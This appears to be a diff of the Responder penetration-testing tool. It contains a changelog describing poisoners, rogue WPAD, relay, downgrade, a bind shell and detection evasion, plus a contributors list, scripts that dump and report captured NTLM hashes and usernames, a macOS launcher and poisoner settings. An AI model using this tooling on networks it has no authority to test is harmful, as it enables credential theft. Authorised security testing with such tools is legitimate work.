+- Removed logs folder. ([5d83778](https://github.com/lgandx/Responder/commit/5d83778ac7caba920874dc49f7523c6ef80b6d7b) by lgandx).
+
+## [v2.3.2.4](https://github.com/lgandx/Responder/releases/tag/v2.3.2.4) - 2016-09-12
+
+<small>[Compare with v2.3.2.3](https://github.com/lgandx/Responder/compare/v2.3.2.3...v2.3.2.4)</small>
+
+## [v2.3.2.3](https://github.com/lgandx/Responder/releases/tag/v2.3.2.3) - 2016-09-12
+
+<small>[Compare with v2.3.2.2](https://github.com/lgandx/Responder/compare/v2.3.2.2...v2.3.2.3)</small>
+
+### Added
+
+- Added new option in Responder.conf. Capture multiple hashes from the same client. Default is On. ([35d933d](https://github.com/lgandx/Responder/commit/35d933d5964df607ec714ced93e4cb197ff2bfe7) by lgandx).
+
+## [v2.3.2.2](https://github.com/lgandx/Responder/releases/tag/v2.3.2.2) - 2016-09-12
+
+<small>[Compare with v2.3.2.1](https://github.com/lgandx/Responder/compare/v2.3.2.1...v2.3.2.2)</small>
+
+### Added
+
+- Added support for webdav, auto credz. ([ad9ce6e](https://github.com/lgandx/Responder/commit/ad9ce6e659ffd9dd31714260f906c8de02223398) by lgandx).
+- Added option -e, specify an external IP address to redirect poisoned traffic to. ([04c270f](https://github.com/lgandx/Responder/commit/04c270f6b75cd8eb833cca3b71965450d925e6ac) by lgandx).
+
+### Removed
+
+- removed debug info ([3e2e375](https://github.com/lgandx/Responder/commit/3e2e375987ce2ae03e6a88ffadabb13823ba859c) by lgandx).
+
+## [v2.3.2.1](https://github.com/lgandx/Responder/releases/tag/v2.3.2.1) - 2016-09-11
+
+<small>[Compare with v2.3.2](https://github.com/lgandx/Responder/compare/v2.3.2...v2.3.2.1)</small>
+
+## [v2.3.2](https://github.com/lgandx/Responder/releases/tag/v2.3.2) - 2016-09-11
+
+<small>[Compare with v2.3.1](https://github.com/lgandx/Responder/compare/v2.3.1...v2.3.2)</small>
+
+### Added
+
+- Added proxy auth server + various fixes and improvements ([82fe64d](https://github.com/lgandx/Responder/commit/82fe64dfd988321cbc1a8cb3d8f01caa38f4193e) by lgandx).
+- Added current date for all HTTP headers, avoiding easy detection ([ecd62c3](https://github.com/lgandx/Responder/commit/ecd62c322f48eadb235312ebb1e57375600ef0f1) by lgandx).
+
+### Removed
+
+- Removed useless HTTP headers ([881dae5](https://github.com/lgandx/Responder/commit/881dae59cf3c95047d82b34208f57f94b3e85b04) by lgandx).
+
+## [v2.3.1](https://github.com/lgandx/Responder/releases/tag/v2.3.1) - 2016-09-09
+
+<small>[Compare with v2.3.0](https://github.com/lgandx/Responder/compare/v2.3.0...v2.3.1)</small>
+
+### Added
+
+- Added SMBv2 support enabled by default. ([85d7974](https://github.com/lgandx/Responder/commit/85d7974513a9b6378ed4c0c07a7dd640c27ead9b) by lgandx).
+- added new option, for Config-Responder.log file. ([a9c2b29](https://github.com/lgandx/Responder/commit/a9c2b297c6027030e3f83c7626fff6f66d5a4f1b) by lgaffie).
+- Add compatability with newer net-tools ifconfig. ([e19e349](https://github.com/lgandx/Responder/commit/e19e34997e68a2f567d04d0c013b7870530b7bfd) by Hank Leininger).
+- Add HTTP Referer logging ([16e6464](https://github.com/lgandx/Responder/commit/16e6464748d3497943a9d96848ead9058dc0f7e9) by Hubert Seiwert).
+- Added recent Windows versions. ([6eca29d](https://github.com/lgandx/Responder/commit/6eca29d08cdd0d259760667da0c41e76d2cd2693) by Jim Shaver).
+- Added: Support for OSx ([59e48e8](https://github.com/lgandx/Responder/commit/59e48e80dd6153f83899413c2fc71a46367d4abf) by lgandx).
+
+### Fixed
+
+- Fixed colors in log files ([d9258e2](https://github.com/lgandx/Responder/commit/d9258e2dd80ab1d62767377250c76bf5c9f2a50d) by lgaffie).
+- Fixed the regexes for Authorization: headers. ([a81a9a3](https://github.com/lgandx/Responder/commit/a81a9a31e4dbef2890fbf51830b6a9374d6a8f8a) by Hank Leininger).
+- Fix Windows 10 support. ([a84b351](https://github.com/lgandx/Responder/commit/a84b3513e1fdd47025ceaa743ce0f506f162640b) by ValdikSS).
+- Fixed color bug in Analyze mode ([04c841d](https://github.com/lgandx/Responder/commit/04c841d34e0d32970f08ae91ad0f931b1b90d6ab) by lgandx).
+- fixed minor bug ([6f8652c](https://github.com/lgandx/Responder/commit/6f8652c0fccfe83078254d7b38cb9fd517a6bf42) by lgandx).
+- Fixed Icmp-Redirect.. ([df63c1f](https://github.com/lgandx/Responder/commit/df63c1fc138d1682a86bc2114a5352ae897865c6) by lgandx).
+- Fixed some tools and +x on some executables ([8171a96](https://github.com/lgandx/Responder/commit/8171a96b9eaac3cd25ef18e8ec8b303c5877f4d0) by lgandx).
+- Fix generation of HTTP response in HTTP proxy ([b2830e0](https://github.com/lgandx/Responder/commit/b2830e0a4f46f62db4d34b3e8f93ea505be32000) by Antonio Herraiz).
+- Fix misspelling of poisoners ([6edc01d](https://github.com/lgandx/Responder/commit/6edc01d8511189489e4b5fd9873f25712920565c) by IMcPwn).
+
+### Changed
+
+- change IsOSX to utils.IsOsX. Fixes #89 ([08c3a90](https://github.com/lgandx/Responder/commit/08c3a90b400d0aff307dd43ff4cd6f01ca71a6cb) by Jared Haight).
+- Changed email address ([f5a8bf0](https://github.com/lgandx/Responder/commit/f5a8bf0650bc088b6ef5ae7432f2baef0d52852c) by lgandx).
+- Changed connection to SQlite db to support different encoded charsets ([0fec40c](https://github.com/lgandx/Responder/commit/0fec40c3b4c621ee21a88906e77c6ea7a56cb8a9) by Yannick Méheut).
+- Changed comment to be more clear about what is being done when logging ([08535e5](https://github.com/lgandx/Responder/commit/08535e55391d762be4259a1fada330ef3f0ac134) by Yannick Méheut).
+
+### Removed
+
+- Removed the config dump in Responder-Session.log. New file gets created in logs, with host network config such as dns, routes, ifconfig and config dump ([a765a8f](https://github.com/lgandx/Responder/commit/a765a8f0949de37940364d0a228aff72c0701aa0) by lgaffie).
+
+## [v2.3.0](https://github.com/lgandx/Responder/releases/tag/v2.3.0) - 2015-09-11
+
+<small>[Compare with v2.1.4](https://github.com/lgandx/Responder/compare/v2.1.4...v2.3.0)</small>
+
+### Added
+
+- Added support for Samba4 clients ([ee033e0](https://github.com/lgandx/Responder/commit/ee033e0c7f28a0584c8ebcb2c31fe949581f0022) by lgandx).
+- Added support for upstream proxies for the rogue WPAD server ([f4bd612](https://github.com/lgandx/Responder/commit/f4bd612e083698fd94308fd2fd15ba7d8d289fd8) by jrmdev).
+
+### Fixed
+
+- Fixed Harsh Parser variable typo ([5ab431a](https://github.com/lgandx/Responder/commit/5ab431a4fe24a2ba4666b9c51ad59a0bb8a0053d) by lgandx).
+- fixed var name ([62ed8f0](https://github.com/lgandx/Responder/commit/62ed8f00626a2ad0fbbfb845e808d77938f4513a) by byt3bl33d3r).
+- Fixes MDNS Name parsing error ([3261288](https://github.com/lgandx/Responder/commit/3261288c82fee415dd8e1ba64b80596ef97da490) by byt3bl33d3r).
+- Fixed FTP module. ([75664a4](https://github.com/lgandx/Responder/commit/75664a4f37feb897be52480223cd1633d322ede8) by jrmdev).
+- Fixing a bug in HTTP proxy, was calling recv() too many times ([ddaa9f8](https://github.com/lgandx/Responder/commit/ddaa9f87674dc8ac3f9104196f2f92cdec130682) by lanjelot).
+
+### Changed
+
+- changed operand ([cb9c2c8](https://github.com/lgandx/Responder/commit/cb9c2c8b97761cc5e00051efd74c9c3fdaf5762d) by byt3bl33d3r).
+
+## [v2.1.4](https://github.com/lgandx/Responder/releases/tag/v2.1.4) - 2014-12-06
+
+<small>[Compare with v2.1.3](https://github.com/lgandx/Responder/compare/v2.1.3...v2.1.4)</small>
+
+### Added
+
+- Added: FindSMB2UPTime script. Find when is the last time a >= 2008 server was updated. ([7a95ef1](https://github.com/lgandx/Responder/commit/7a95ef1474d3cea88680f359581aa89a4e9c30f5) by lgandx).
+
+## [v2.1.3](https://github.com/lgandx/Responder/releases/tag/v2.1.3) - 2014-11-27
+
+<small>[Compare with v2.1.2](https://github.com/lgandx/Responder/compare/v2.1.2...v2.1.3)</small>
+
+### Added
+
+- Added: DontRespondToName and DontRespondTo; NAC/IPS detection evasion ([36ef78f](https://github.com/lgandx/Responder/commit/36ef78f85aea5db33f37a6d1d73bf3bb7f82336f) by lgandx).
+- Added --version and kost's fix for /etc/resolv.conf empty lines parsing. ([c05bdfc](https://github.com/lgandx/Responder/commit/c05bdfce17234b216b408080d9aba5db443de507) by lgandx).
+
+## [v2.1.2](https://github.com/lgandx/Responder/releases/tag/v2.1.2) - 2014-08-26
+
+<small>[Compare with v2.1.0](https://github.com/lgandx/Responder/compare/v2.1.0...v2.1.2)</small>
+
+### Added
+
+- Added: Log command line in Responder-Session.log. ([f69e93c](https://github.com/lgandx/Responder/commit/f69e93c02e81a83309d3863f6d5680b36378a16b) by lgandx).
+
+### Fixed
+
+- Fixed serve-always and serve-exe with the new WPAD server. ([cf7b477](https://github.com/lgandx/Responder/commit/cf7b4771caf335a1a283fae08923c413acae3343) by lgandx).
+
+## [v2.1.0](https://github.com/lgandx/Responder/releases/tag/v2.1.0) - 2014-08-16
+
+<small>[Compare with v2.0.9](https://github.com/lgandx/Responder/compare/v2.0.9...v2.1.0)</small>
+
+### Fixed
+
+- fixed: identation. ([5c9fec9](https://github.com/lgandx/Responder/commit/5c9fec923c8cb77f00466db6192b1ecb8980bdcf) by lgandx).
+
+## [v2.0.9](https://github.com/lgandx/Responder/releases/tag/v2.0.9) - 2014-05-28
+
+<small>[Compare with v2.0.8](https://github.com/lgandx/Responder/compare/v2.0.8...v2.0.9)</small>
+
+### Fixed
+
+- Fixed high cpu usage in some specific cases ([4558861](https://github.com/lgandx/Responder/commit/4558861ce2dd56c0e4c5157437c8726a26e382c5) by lgandx).
+
+### Removed
+
+- Removed: old style options. Just use -r instead of -r On ([a21aaf7](https://github.com/lgandx/Responder/commit/a21aaf7987e26eee5455d68cd76ff56b5466b7f2) by lgandx).
+
+## [v2.0.8](https://github.com/lgandx/Responder/releases/tag/v2.0.8) - 2014-04-22
+
+<small>[Compare with v2.0.7](https://github.com/lgandx/Responder/compare/v2.0.7...v2.0.8)</small>
+
+### Added
+
+- Added: in-scope target,  windows >= Vista support (-R) and  unicast answers only. ([2e4ed61](https://github.com/lgandx/Responder/commit/2e4ed61bba2df61a1e1165b466a369639c425955) by lgandx).
+
+## [v2.0.7](https://github.com/lgandx/Responder/releases/tag/v2.0.7) - 2014-04-16
+
+<small>[Compare with v2.0.6](https://github.com/lgandx/Responder/compare/v2.0.6...v2.0.7)</small>
+
+### Added
+
+- Added: in-scope llmnr/nbt-ns name option ([1c79bed](https://github.com/lgandx/Responder/commit/1c79bedac9083992ba019ff7134cdb3c718a6f15) by lgandx).
+- Added: Kerberos server and -d cli option. ([dcede0f](https://github.com/lgandx/Responder/commit/dcede0fdf5e060e77fc51fbad2da3dbbff8edf8d) by lgandx).
+
+## [v2.0.6](https://github.com/lgandx/Responder/releases/tag/v2.0.6) - 2014-04-01
+
+<small>[Compare with v2.0.5](https://github.com/lgandx/Responder/compare/v2.0.5...v2.0.6)</small>
+
+### Fixed
+
+- Fixed [Enter] key issue ([c97a13c](https://github.com/lgandx/Responder/commit/c97a13c1bdb79b4dcdf43f889fdd586c3c39b893) by lgandx).
+
+## [v2.0.5](https://github.com/lgandx/Responder/releases/tag/v2.0.5) - 2014-03-22
+
+<small>[Compare with v2.0.4](https://github.com/lgandx/Responder/compare/v2.0.4...v2.0.5)</small>
+
+### Added
+
+- Added: In-scope IP handling for MDNS ([b14ff0b](https://github.com/lgandx/Responder/commit/b14ff0b36a100736f293ddbd8bbe1c538a370347) by lgandx).
+
+## [v2.0.4](https://github.com/lgandx/Responder/releases/tag/v2.0.4) - 2014-03-22
+
+<small>[Compare with v2.0.3](https://github.com/lgandx/Responder/compare/v2.0.3...v2.0.4)</small>
+
+### Added
+
+- Added: MDNS Poisoner ([90479ad](https://github.com/lgandx/Responder/commit/90479adcca066602885ea2bfec32953ce71d6977) by lgandx).
+
+## [v2.0.3](https://github.com/lgandx/Responder/releases/tag/v2.0.3) - 2014-03-21
+
+<small>[Compare with v2.0.2](https://github.com/lgandx/Responder/compare/v2.0.2...v2.0.3)</small>
+
+### Fixed
+
+- fix: Bind to interface bug. ([a1a4f46](https://github.com/lgandx/Responder/commit/a1a4f46c7ba8861ff71c1ea2045a72acf2c829bd) by lgandx).
+
+## [v2.0.2](https://github.com/lgandx/Responder/releases/tag/v2.0.2) - 2014-02-06
+
+<small>[Compare with v2.0.1](https://github.com/lgandx/Responder/compare/v2.0.1...v2.0.2)</small>
+
+### Added
+
+- Added: Analyze mode; Lanman Domain/SQL/Workstation passive discovery. ([2c9273e](https://github.com/lgandx/Responder/commit/2c9273eb2ca8d5080ff81273f602547fe649c259) by lgandx).
+
+## [v2.0.1](https://github.com/lgandx/Responder/releases/tag/v2.0.1) - 2014-01-30
+
+<small>[Compare with first commit](https://github.com/lgandx/Responder/compare/e821133708098c74497a3f9b0387a3ad048d5a48...v2.0.1)</small>
+
+### Added
+
+- Added: Analyze ICMP Redirect plausibility on current subnet. ([06df704](https://github.com/lgandx/Responder/commit/06df704960c556e3c2261a52827d55eb7b4ed0d4) by lgandx).
+- Added: Analyze stealth mode. See all traffic, but dont answer (-A cli). Minor bugs also fixed. ([9bb2f81](https://github.com/lgandx/Responder/commit/9bb2f81044cd94f36f54c8daf7f1183bc761bb24) by lgandx).
+- Added: -F command line switch to force authentication on PAC file retrieval. Default is Off ([3f48c11](https://github.com/lgandx/Responder/commit/3f48c114d5e713bfe68bef1717e18d3c266f358e) by lgandx).
+- Added: IMAP module and enhanced wpad. ([af60de9](https://github.com/lgandx/Responder/commit/af60de95679f20eca4765b1450f80c48fbef689c) by lgandx).
+- Added: SMTP PLAIN/LOGIN module ([6828f1b](https://github.com/lgandx/Responder/commit/6828f1b11ebfc0fc25a8fd00e8f373f3adfb7fc6) by lgandx).
+- Added: POP3 module. ([f48ea3f](https://github.com/lgandx/Responder/commit/f48ea3f4b644c3eb25c63d402c6d30fcd29be529) by lgandx).
+- Added: MSSQL Plaintext module ([4c3a494](https://github.com/lgandx/Responder/commit/4c3a494c86b7a95cf2c43a71bac182f231bf71cb) by lgandx).
+- Added: SMBRelay module ([4dd9d8c](https://github.com/lgandx/Responder/commit/4dd9d8c1df3717ed928e73083c30e21aa5eaf8b4) by lgandx).
+- added: Command switch -v for verbose mode. Responder is now less verbose. ([46b98a6](https://github.com/lgandx/Responder/commit/46b98a616d540ae618198784d0775e687371858e) by lgandx).
+- Added support for .pac file requests. ([6b7e5b6](https://github.com/lgandx/Responder/commit/6b7e5b6441c7fdf19a163b8efb6fd588ccfee8ae) by lgandx).
+- Added: print HTTP URL, POST data requested prior auth ([f616718](https://github.com/lgandx/Responder/commit/f6167183e046d2759ab6b885dd2f94bb2902c564) by lgandx).
+- Added command switch -I. This option override Responder.conf Bind_to setting ([68de4ac](https://github.com/lgandx/Responder/commit/68de4ac26ec34bbf24524abb0c0b11ae34aa27a3) by lgandx).
+- Added: in-scope only target. See Responder.conf. ([0465bd6](https://github.com/lgandx/Responder/commit/0465bd604d7cc22ef2c97f938d8564677030e5bd) by lgandx).
+- Added: Fake access denied html page ([9b608aa](https://github.com/lgandx/Responder/commit/9b608aad30529e2bfea4d7c6e99343df0ba2d9d0) by lgandx).
+- Added: Configuration file, removed several cli options and several fixes. ([95eed09](https://github.com/lgandx/Responder/commit/95eed099424568d4c67402f12a5de5d9d72c3041) by lgandx).
+- Added: Configuration file for Responder ([d573102](https://github.com/lgandx/Responder/commit/d57310273df524b99d17c97b49ee35eb3aec7b52) by lgandx).
+- Added: Bind shell listening on port 140, use it with -e or -exe option if needed ([1079de0](https://github.com/lgandx/Responder/commit/1079de052b7cc7c6caeb80e6ee081568ff359317) by Lgandx).
+- Added: Ability to serve whatever kind of file via HTTP and WPAD There's now 3 new options. ([a8c2952](https://github.com/lgandx/Responder/commit/a8c29522db3555f7733a80d29271b3229e1149c6) by Lgandx).
+- added -I option to bind all sockets to a specific ip (eg: listen only on eth0) ([d5088b2](https://github.com/lgandx/Responder/commit/d5088b24ee3d8bead640b37480be57fe564e70b5) by Lgandx).
+- added: HTTP auth forward to SMB. This is useful for SMB Relay or LM downgrade from HTTP NTLM ESS to SMB LM. ([0fcaa68](https://github.com/lgandx/Responder/commit/0fcaa68c074e496edb2164ca35659ff636b5a361) by Lgandx).
+- added automatic poisoning mode when a primary and a secondary DNS is specified. ([ccbbbe3](https://github.com/lgandx/Responder/commit/ccbbbe34535c12b664a39f5a99f98c1da79ca5a6) by Lgandx).
+- Added HTTPS module. ([9250281](https://github.com/lgandx/Responder/commit/92502814aa3becdd064f0bfb160af826adb42f60) by Lgandx).
+- Added support for LM hash downgrade. Default still NTLMSSP. ([09f8f72](https://github.com/lgandx/Responder/commit/09f8f7230d66cb35e1e6bed9fb2c9133ad5cc415) by Lgandx).
+- Added: Client ip is now part of the cookie filename ([2718f9c](https://github.com/lgandx/Responder/commit/2718f9c51310e18e91d6d90c86657bdd72889f2a) by Lgandx).
+- Added a folder for storing HTTP cookies files ([d1a14e2](https://github.com/lgandx/Responder/commit/d1a14e2f27d856ca1551232502835d6cddb3602d) by Lgandx).
+- Added WPAD transparent proxy ([9f1c3bc](https://github.com/lgandx/Responder/commit/9f1c3bcba32c6feb008a39ece688522dcd9e757f) by Lgandx).
+
+### Fixed
+
+- Fixed WPAD cookie capture ([afe2b63](https://github.com/lgandx/Responder/commit/afe2b63c6a556a6da97e7ac89c96f89276d521c3) by lgandx).
+- Fix: Command line switch typo ([4fb4233](https://github.com/lgandx/Responder/commit/4fb4233424273849085781225298de39b6c9c098) by lgandx).
+- Fixed minor bugs ([f8a16e2](https://github.com/lgandx/Responder/commit/f8a16e28ee15a3af91542269e5b1ec9c69ea3d75) by Lgandx).
+- Fixed duplicate entry in hash file for machine accounts ([4112b1c](https://github.com/lgandx/Responder/commit/4112b1cd5d06f021dcc145f32d29b53d4cb8d82a) by Lgandx).
+- fix for anonymous NTLM connection for LDAP server ([1c47e7f](https://github.com/lgandx/Responder/commit/1c47e7fcb112d0efdb509e56a1b08d557eb9f375) by Lgandx).
+
+### Changed
+
+- Changed WPAD to Off by default. Use command line -w On to enable. ([bf2fdf0](https://github.com/lgandx/Responder/commit/bf2fdf083cdadf81747f87eb138a474911928b77) by lgandx).
+- changed .txt to no extension. ([5f7bfa8](https://github.com/lgandx/Responder/commit/5f7bfa8cbe75d0c7fd24c8a83c44a5c3b02717a4) by lgandx).
+- Changed Windows =< 5.2 documentation to XP/2003 and earlier for clarification ([56dd7b8](https://github.com/lgandx/Responder/commit/56dd7b828cf85b88073e88a8b4409f7dae791d49) by Garret Picchioni).
+
+### Removed
+
+- Removed bind to interface support for OsX. Responder for OsX can only listen on all interfaces. ([dbfdc27](https://github.com/lgandx/Responder/commit/dbfdc2783156cfeede5114735ae018a925b3fa78) by lgandx).
+

Contributors

@@ -0,0 +1,76 @@
+Commits | user
+15  @jrmdev
+7   @nobbd
+6   @ValdikSS
+6   @also-here
+5   @HexPandaa
+5   @exploide
+5   @jvoisin
+4   @Clément Notin
+4   @Shutdown
+4   @Yannick Méheut
+3   @Hank Leininger
+3   @brightio
+3   @byt3bl33d3r
+3   @myst404
+3   @skelsec
+2   @Alexandre ZANNI
+2   @Crypt0-M3lon
+2   @Laban Sköllermark
+2   @Matthew Daley
+2   @Pixis
+2   @Rob Fuller
+2   @ThePirateWhoSmellsOfSunflowers
+2   @Vincent Yiu
+2   @requin
+1   @Andrii Nechytailov
+1   @Antonio Herraiz
+1   @Chris Maddalena
+1   @Euan
+1   @Garret Picchioni
+1   @Gifts
+1   @Gustaf Blomqvist
+1   @Hubert Seiwert
+1   @IMcPwn
+1   @Jared Haight
+1   @Jim Shaver
+1   @Khiem Doan
+1   @Leon Jacobs
+1   @Lionel PRAT
+1   @Markus
+1   @MatToufoutu
+1   @Matt
+1   @Matt Andreko
+1   @Matt Kelly
+1   @Nikos Vassakis
+1   @OJ
+1   @Paul A
+1   @Randy Ramos
+1   @SAERXCIT
+1   @Sagar-Jangam
+1   @Sans23
+1   @Sophie Brun
+1   @Stephen Shkardoon
+1   @Syntricks
+1   @Timon Hackenjos
+1   @Tom Aviv
+1   @Ziga P
+1   @cweedon
+1   @deltronzero
+1   @f3rn0s
+1   @jackassplus
+1   @jb
+1   @kevintellier
+1   @kitchung
+1   @klemou
+1   @lanjelot
+1   @nickyb
+1   @nodauf
+1   @nop5L3D
+1   @pixis
+1   @ravenium
+1   @soa
+1   @steven
+1   @thejosko
+1   @trustedsec
+

DumpHash.py

@@ -0,0 +1,55 @@
+#!/usr/bin/env python3
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sqlite3
+
+def DumpHashToFile(outfile, data):
+	with open(outfile,"w") as dump:
+		dump.write(data)
+
+def DbConnect():
+    cursor = sqlite3.connect("./Responder.db")
+    return cursor
+
+def GetResponderCompleteNTLMv2Hash(cursor):
+     res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
+     Output = ""
+     for row in res.fetchall():
+         if "$" in row[0]:
+             pass
+         else:
+            Output += '{0}'.format(row[0])+'\n'
+     return Output
+
+def GetResponderCompleteNTLMv1Hash(cursor):
+     res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
+     Output = ""
+     for row in res.fetchall():
+         if "$" in row[0]:
+             pass
+         else:
+            Output += '{0}'.format(row[0])+'\n'
+     return Output
+
+cursor = DbConnect()
+print("Dumping NTLMV2 hashes:")
+v2 = GetResponderCompleteNTLMv2Hash(cursor)
+DumpHashToFile("DumpNTLMv2.txt", v2)
+print(v2)
+print("\nDumping NTLMv1 hashes:")
+v1 = GetResponderCompleteNTLMv1Hash(cursor)
+DumpHashToFile("DumpNTLMv1.txt", v1)
+print(v1)

OSX_launcher.sh

@@ -0,0 +1,39 @@
+# responder launcher
+# set -x
+# Usage:
+# ./responderd /path/to/responder interface responder_options
+
+# port list
+# Everything -> tcp:21 tcp:80 tcp:25 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:443 tcp:445 tcp:110 tcp:389 tcp:1433 tcp:3141 udp:5353 udp:5355
+PORT_LIST=(tcp:21 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:445 tcp:389 tcp:1433 udp:5353 udp:5355)
+SVC_LIST=()
+
+# check for running processes and kill them one by one
+# looping over everything rather than doing a mass kill because some processes may be 
+# children and may not need to be killed
+for port in ${PORT_LIST[@]}; do
+	PROC=$(lsof +c 0 -i $port | grep -m 1 -v 'launchd\|COMMAND' | cut -d' ' -f1)
+	if [ -n "$PROC" ]; then
+        AGENT=$(sudo launchctl list | grep -m 1 $PROC | cut -f3 | sed 's/.reloaded//g')
+
+        # load/unload are listed as "legacy" in 10.10+ may need to change this someday
+		echo "Stopping $PROC"
+        sudo launchctl unload -w /System/Library/LaunchDaemons/$AGENT.plist
+
+        # append killed service to new array
+        SVC_LIST+=($AGENT)
+	fi
+done
+
+# get IP address
+IP=$(ifconfig $2 | grep 'inet ' | cut -d' ' -f2)
+
+# Launch responder
+python $1 $3 -i $IP
+
+# restore stopped services
+for agent in ${SVC_LIST[@]}; do
+	echo "Starting $agent"
+		sudo launchctl load -w /System/Library/LaunchDaemons/$agent.plist
+
+done

Report.py

@@ -0,0 +1,127 @@
+#!/usr/bin/env python3
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sqlite3
+import os
+
+def color(txt, code = 1, modifier = 0):
+	if txt.startswith('[*]'):
+		settings.Config.PoisonersLogger.warning(txt)
+	elif 'Analyze' in txt:
+		settings.Config.AnalyzeLogger.warning(txt)
+
+	if os.name == 'nt':  # No colors for windows...
+		return txt
+	return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+def DbConnect():
+    cursor = sqlite3.connect("./Responder.db")
+    return cursor
+
+def FingerDbConnect():
+    cursor = sqlite3.connect("./tools/RunFinger.db")
+    return cursor
+    
+def GetResponderData(cursor):
+     res = cursor.execute("SELECT * FROM Responder")
+     for row in res.fetchall():
+         print('{0} : {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}'.format(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8]))
+
+def GetResponderUsernamesStatistic(cursor):
+     res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder")
+     for row in res.fetchall():
+         print(color('\n[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1))
+
+def GetResponderUsernames(cursor):
+     res = cursor.execute("SELECT DISTINCT user FROM Responder")
+     for row in res.fetchall():
+         print('User account: {0}'.format(row[0]))
+
+def GetResponderUsernamesWithDetails(cursor):
+     res = cursor.execute("SELECT client, user, module, type, cleartext FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder) ORDER BY client")
+     for row in res.fetchall():
+         print('IP: {0} module: {1}:{3}\nuser account: {2}'.format(row[0], row[2], row[1], row[3]))
+
+
+def GetResponderCompleteHash(cursor):
+     res = cursor.execute("SELECT fullhash FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
+     for row in res.fetchall():
+         print('{0}'.format(row[0]))
+
+def GetUniqueLookupsIP(cursor):
+     res = cursor.execute("SELECT Poisoner, SentToIp FROM Poisoned WHERE Poisoner in (SELECT DISTINCT UPPER(Poisoner) FROM Poisoned)")
+     for row in res.fetchall():
+         if 'fe80::' in row[1]:
+             pass
+         else: 
+             print('Protocol: {0}, IP: {1}'.format(row[0], row[1]))
+
+def GetUniqueLookups(cursor):
+     res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
+     for row in res.fetchall():
+         print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3]))
+
+def GetUniqueDHCP(cursor):
+     res = cursor.execute("SELECT * FROM DHCP WHERE MAC in (SELECT DISTINCT UPPER(MAC) FROM DHCP)")
+     for row in res.fetchall():
+         print('MAC: {0}, IP: {1}, RequestedIP: {2}'.format(row[1], row[2], row[3]))
+
+def GetRunFinger(cursor):
+     res = cursor.execute("SELECT * FROM RunFinger WHERE Host in (SELECT DISTINCT Host FROM RunFinger)")
+     for row in res.fetchall():
+         print(("{},['{}', Os:'{}', Build:'{}', Domain:'{}', Bootime:'{}', Signing:'{}', Null Session: '{}', RDP:'{}', SMB1:'{}', MSSQL:'{}']".format(row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11])))
+
+def GetStatisticUniqueLookups(cursor):
+     res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)")
+     for row in res.fetchall():
+         print(color('\n[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1))
+
+
+def SavePoisonersToDb(result):
+
+	for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode']:
+		if not k in result:
+			result[k] = ''
+
+def SaveToDb(result):
+
+	for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
+		if not k in result:
+			result[k] = ''
+
+cursor = DbConnect()
+print(color("[+] Generating report...\n", code = 3, modifier = 1))
+
+print(color("[+] DHCP Query Poisoned:", code = 2, modifier = 1))
+GetUniqueDHCP(cursor)
+print(color("\n[+] Unique IP using legacy protocols:", code = 2, modifier = 1))
+GetUniqueLookupsIP(cursor)
+print(color("\n[+] Unique lookups ordered by IP:", code = 2, modifier = 1))
+GetUniqueLookups(cursor)
+GetStatisticUniqueLookups(cursor)
+print(color("\n[+] Extracting captured usernames:", code = 2, modifier = 1))
+GetResponderUsernames(cursor)
+print(color("\n[+] Username details:", code = 2, modifier = 1))
+GetResponderUsernamesWithDetails(cursor)
+GetResponderUsernamesStatistic(cursor)
+print (color("\n[+] RunFinger Scanned Hosts:", code = 2, modifier = 1))
+cursor.close()
+try:
+	cursor = FingerDbConnect()
+	GetRunFinger(cursor)
+except:
+	pass
+print('\n')

Responder.conf

@@ -1,20 +1,36 @@
 [Responder Core]
 
-; Servers to start
-SQL = On
-SMB = On
-Kerberos = On
-FTP = On
-POP = On
-SMTP = On
-IMAP = On
-HTTP = On
-HTTPS = On
-DNS = On
-LDAP = On
+; Poisoners to start
+MDNS  = On
+LLMNR = On
+NBTNS = On
 
-; Custom challenge
-Challenge = 1122334455667788
+#IPv6 conf:
+DHCPv6 = Off
+
+; Servers to start
